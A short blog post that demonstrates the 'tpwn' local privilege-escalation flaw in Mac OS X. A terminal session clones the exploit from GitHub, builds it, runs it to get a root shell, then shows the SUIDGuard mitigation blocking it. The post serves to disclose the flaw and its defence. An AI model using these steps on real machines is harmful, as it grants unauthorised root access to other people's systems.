Tag Archives: exploit

Serious flaw in Mac OS X

$ git clone https://github.com/kpwn/tpwn.git
Cloning into 'tpwn'...
remote: Counting objects: 19, done.
remote: Total 19 (delta 0), reused 0 (delta 0), pack-reused 19
Unpacking objects: 100% (19/19), done.
Checking connectivity... done.
$ cd tpwn/
$ make
gcc *.m -o tpwn -framework IOKit -framework Foundation -m32 -Wl,-pagezero_size,0 -O3
strip tpwn
$ ./tpwn
leaked kaslr slide, @ 0x0000000000000000
sh-3.2# id
uid=0(root) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),33(_appstore),100(_lpoperator),204(_developer),395(com.apple.access_ftp),398(com.apple.access_screensharing-disabled),399(com.apple.access_ssh-disabled)
sh-3.2#

Original post: Young Italian discovers two serious flaws in Mac OS X

Solution #1: NULLGuard

Solution #2: SUIDGuard

SUIDGuard looks like professional (enterprise) solution for the problem, official website www.suidguard.com

$ open ~/Downloads/SUIDGuardNG-106.dmg
$ sudo kextload -v /Library/Extensions/SUIDGuardNG.kext
Password:
Requesting load of /Library/Extensions/SUIDGuardNG.kext.
/Library/Extensions/SUIDGuardNG.kext loaded successfully (or already loaded).
$ ./tpwn
Killed: 9

Perfect!